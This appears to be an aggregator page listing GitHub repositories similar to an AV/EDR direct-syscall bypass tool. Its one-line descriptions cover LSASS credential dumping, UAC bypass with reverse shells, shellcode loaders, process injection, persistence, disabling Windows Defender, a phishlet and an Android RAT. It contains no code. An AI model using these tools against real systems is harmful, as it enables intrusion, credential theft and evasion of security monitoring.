Direct syscalls Injection to bypass AV/EDR
☆11May 18, 2024Updated last year
Alternatives and similar repositories for on-disk-detection-bypass
Users that are interested in on-disk-detection-bypass are comparing it to the libraries listed below
Sorting:
- "D3MPSEC" is a memory dumping tool designed to extract memory dump from Lsass process using various techniques, including direct system c…☆28Sep 18, 2024Updated last year
- A tool to assist DLL hijacking via the Havoc GUI☆12Jan 9, 2024Updated 2 years ago
- DLL Hijacking and Mock directories technique to bypass Windows UAC security feature and getting high-level privileged reverse shell. Secu…☆42May 18, 2024Updated last year
- string/file/shellcode encryptor using AES/XOR☆11Oct 15, 2023Updated 2 years ago
- A proof-of-concept to demonstrate randomized execution paths and their impact on call stack signatures — ideal for EDR testing, behavior-…☆25Jan 17, 2026Updated last month
- Malware persistence via COM DLL hijacking. C++ implementation example☆13May 2, 2022Updated 3 years ago
- Process injection via KernelCallbackTable☆13Jan 28, 2022Updated 4 years ago
- NimReflectiveLoader is a Nim-based tool for in-memory DLL execution using Reflective DLL Loading.☆31Jan 21, 2024Updated 2 years ago
- Using syscall to load shellcode, Evasion techniques☆27Jul 18, 2021Updated 4 years ago
- This exploit is utilising AddressOfEntryPoint of process which is RX and using WriteProcessMemory internal magic to change the permission…☆18Oct 31, 2024Updated last year
- ☆18Sep 1, 2025Updated 6 months ago
- BloodyAv is Custom Shell Code loader to Bypass Av and Edr.☆14Mar 21, 2022Updated 3 years ago
- Example of async client/server sockets in .NET 5☆17Jun 9, 2021Updated 4 years ago
- Windows process injection methods☆18Jul 18, 2021Updated 4 years ago
- Transparently call NTAPI via Halo's Gate with indirect syscalls.☆15Apr 26, 2024Updated last year
- Bypass Malware Time Delays☆107Sep 23, 2022Updated 3 years ago
- A Multilayered AV/EDR Evasion Framework and AV Testing Tool.☆18Jun 28, 2025Updated 8 months ago
- Collection of Offensive C# Tooling☆13Nov 4, 2021Updated 4 years ago
- Another Portable Executable files analysing stuff☆21May 28, 2011Updated 14 years ago
- MalDev & AV-EDR Evasion for Pentesters☆20Feb 17, 2023Updated 3 years ago
- 7 days of Red Teaming TTPs that your favorite tools may use to acheive a post exploitation goal☆18Apr 17, 2021Updated 4 years ago
- Beacon Object File implementation of Yaxser's Backstab☆15Mar 9, 2022Updated 3 years ago
- Bypass Windows defender syscall☆18Jul 17, 2021Updated 4 years ago
- This is the combination of multiple evasion techniques to evade defenses. (Dirty Vanity)☆51May 8, 2024Updated last year
- Get-PDInvokeImports is tool (PowerShell module) which is able to perform automatic detection of P/Invoke, Dynamic P/Invoke and D/Invoke u…☆54Apr 10, 2022Updated 3 years ago
- AhMyth is an popular open source android rat. But the official AhMyth contains many bugs. For an example, you can't fetch victim's files …☆23Jan 30, 2021Updated 5 years ago
- This repository contains the analysis reports, technical details or any tools created for helping in malware analysis. Additionally, the …☆23Jun 17, 2025Updated 8 months ago
- Mythic C2 wrapper for NimSyscallPacker☆25Mar 12, 2025Updated 11 months ago
- Some of the techniques used in Malware Windows - Persistence(Registry HKCU,startup),Disable Windows Firewall,Disable Windows Defender☆23Nov 20, 2022Updated 3 years ago
- Abusing Windows fork API and OneDrive.exe process to inject the malicious shellcode without allocating new RWX memory region.☆289May 27, 2024Updated last year
- A C# project that builds a Web Application which redirects all HTTPS☆26Feb 11, 2025Updated last year
- Malicious powershell scripts loader designed to avoid detection.☆61Jun 16, 2023Updated 2 years ago
- Slides and POC demo for my talk at Divizion Zero on EDR evasion titled "Evasion Adventures"☆31Jan 14, 2023Updated 3 years ago
- Detect userland hooks placed by AV/EDR☆28Sep 4, 2023Updated 2 years ago
- A public repository of MITRE ATT&ACK TTP mappings by BushidoUK for OSINT reports that lack a section breaking down the TTPs.☆27Mar 20, 2025Updated 11 months ago
- ☆64Jan 2, 2024Updated 2 years ago
- Citrix Phishlet☆24Feb 2, 2021Updated 5 years ago
- Impacket is a collection of Python classes for working with network protocols.☆31Jun 27, 2024Updated last year
- Satanic Crypter A powerful tool designed to convert EXE files into BAT files with advanced features and a modern GUI interface.☆11Jan 4, 2025Updated last year